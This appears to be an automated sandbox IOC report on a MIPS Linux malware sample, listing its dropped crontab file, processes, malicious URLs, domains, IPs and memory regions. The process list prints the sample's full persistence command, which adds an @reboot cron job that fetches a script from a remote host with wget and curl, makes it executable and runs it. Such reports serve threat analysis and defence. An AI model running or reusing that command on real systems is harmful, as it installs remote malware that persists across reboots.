IOC Report
nshmpsl.elf

loading gif

Files

File Path
Type
Category
Malicious
nshmpsl.elf
ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
initial sample
malicious
/var/spool/cron/crontabs/tmp.98hekB
ASCII text
dropped
malicious

Processes

Path
Cmdline
Malicious
/tmp/nshmpsl.elf
/tmp/nshmpsl.elf
/tmp/nshmpsl.elf
-
/bin/sh
sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
/bin/sh
-
/bin/sh
-
/usr/bin/crontab
crontab -l
/bin/sh
-
/usr/bin/crontab
crontab -
/tmp/nshmpsl.elf
-
/tmp/nshmpsl.elf
-
/tmp/nshmpsl.elf
-
/tmp/nshmpsl.elf
-
/tmp/nshmpsl.elf
-
There are 3 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://hailcocks.ru/wget.sh;
unknown

Domains

Name
IP
Malicious
kingstonwikkerink.dyn
193.233.193.45
malicious

IPs

IP
Domain
Country
Malicious
193.233.193.45
kingstonwikkerink.dyn
Russian Federation
malicious
91.149.218.232
unknown
Poland
malicious
88.151.195.22
unknown
Azerbaijan
malicious
81.29.149.178
unknown
Switzerland
malicious
91.149.238.18
unknown
Poland
malicious
213.182.204.57
unknown
Latvia
51.89.127.38
unknown
France
194.87.198.29
unknown
Russian Federation
195.133.92.51
unknown
Russian Federation
86.107.100.80
unknown
Romania

Memdumps

Base Address
Regiontype
Protect
Malicious
7ffc1b9ec000
page read and write
7f4be0000000
page read and write
56382008e000
page read and write
7f4b60459000
page read and write
7f4be54c6000
page read and write
56381e073000
page execute and read and write
7f4b60418000
page execute read
7f4be0021000
page read and write
7f4be0000000
page read and write
56381c06b000
page read and write
56381bde3000
page execute read
7f4b6045f000
page read and write
7ffc1b9f3000
page execute read
7f4be0021000
page read and write
7f4be0000000
page read and write
56381e073000
page execute and read and write
56381c06b000
page read and write
7f4be42ee000
page read and write
7f4be0021000
page read and write
7ffc1b9f3000
page execute read
7f4be57d8000
page read and write
56381bde3000
page execute read
7ffc1b9ec000
page read and write
7f4be4b04000
page read and write
7f4be4db4000
page read and write
7ffc1b9ec000
page read and write
7f4be5195000
page read and write
7f4b60418000
page execute read
7f4be4db4000
page read and write
7f4be56a7000
page read and write
56381bde3000
page execute read
7f4be581d000
page read and write
7f4be4af6000
page read and write
7f4b6045f000
page read and write
7f4be57d8000
page read and write
7f4be4af6000
page read and write
56381c075000
page read and write
7f4be42ee000
page read and write
56381c06b000
page read and write
7f4b60418000
page execute read
56382008e000
page read and write
7f4be4af6000
page read and write
56381c075000
page read and write
56381c075000
page read and write
7ffc1b9f3000
page execute read
7f4be4db4000
page read and write
7f4be54c6000
page read and write
7f4be56a7000
page read and write
7f4be57d0000
page read and write
7f4be5178000
page read and write
56381e08a000
page read and write
7f4be57d8000
page read and write
7f4be5155000
page read and write
7f4be5155000
page read and write
7f4be5195000
page read and write
7f4be57d0000
page read and write
7f4be42ee000
page read and write
7f4be4b04000
page read and write
7f4be5178000
page read and write
7f4be0000000
page read and write
7f4be57d0000
page read and write
7f4be5155000
page read and write
56381c075000
page read and write
56381c06b000
page read and write
7f4be581d000
page read and write
7f4be4db4000
page read and write
7f4be42ee000
page read and write
7f4b60418000
page execute read
7f4be56a7000
page read and write
7f4b60459000
page read and write
7ffc1b9ec000
page read and write
7f4be5178000
page read and write
56381e08a000
page read and write
56382008e000
page read and write
7f4be5155000
page read and write
7f4b60459000
page read and write
7f4be54c6000
page read and write
56381e08a000
page read and write
56381e073000
page execute and read and write
7f4be0021000
page read and write
7f4be5195000
page read and write
7f4be57d0000
page read and write
7ffc1b9f3000
page execute read
7f4be56a7000
page read and write
7f4be5195000
page read and write
7f4b60459000
page read and write
7f4be4b04000
page read and write
7f4b6045f000
page read and write
56381bde3000
page execute read
56381e073000
page execute and read and write
7f4be581d000
page read and write
56382008e000
page read and write
7f4be54c6000
page read and write
7f4be5178000
page read and write
7f4be581d000
page read and write
7f4be4af6000
page read and write
7f4be4b04000
page read and write
7f4be57d8000
page read and write
7f4b6045f000
page read and write
56381e08a000
page read and write
There are 90 hidden memdumps, click here to show them.